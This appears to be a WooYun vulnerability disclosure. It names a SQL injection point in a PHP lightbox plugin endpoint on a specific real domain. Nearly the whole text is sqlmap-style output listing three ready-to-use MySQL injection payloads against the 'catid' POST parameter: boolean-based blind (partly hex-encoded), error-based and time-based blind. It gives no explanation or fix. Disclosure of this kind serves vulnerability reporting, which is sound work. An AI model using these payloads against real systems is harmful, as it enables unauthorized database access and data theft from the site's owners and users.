WooYun.org

注入点：bjuu.xdf.cn/pp/plugins/lightbox/save_history.php
---
Place: POST
Parameter: catid
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
Payload: catid=(SELECT (CASE WHEN (3169=3169) THEN 0x2873656c656374203120616e6420726f7728312c31293e2873656c65637420636f756e74282a292c636f6e63617428636f6e6361742843484152283532292c43484152283637292c4348415228313137292c4348415228313133292c4348415228313135292c4348415228313134292c43484152283530292c43484152283738292c43484152283736292c43484152283534292c4348415228393029292c666c6f6f722872616e6428292a322929782066726f6d202873656c656374203120756e696f6e2073656c656374203229612067726f75702062792078206c696d697420312929 ELSE 3169*(SELECT 3169 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&imgid=img-45625&section=best_rated&tagids=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: catid=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(113),CHAR(115),CHAR(114),CHAR(50),CHAR(78),CHAR(76),CHAR(54),CHAR(90)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) AND (SELECT 3441 FROM(SELECT COUNT(*),CONCAT(0x7169616771,(SELECT (CASE WHEN (3441=3441) THEN 1 ELSE 0 END)),0x71736c6471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&imgid=img-45625&section=best_rated&tagids=
Type: AND/OR time-based blind
Title: MySQL >= 5.0 time-based blind - Parameter replace
Payload: catid=(SELECT (CASE WHEN (2041=2041) THEN SLEEP(5) ELSE 2041*(SELECT 2041 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&imgid=img-45625&section=best_rated&tagids=
---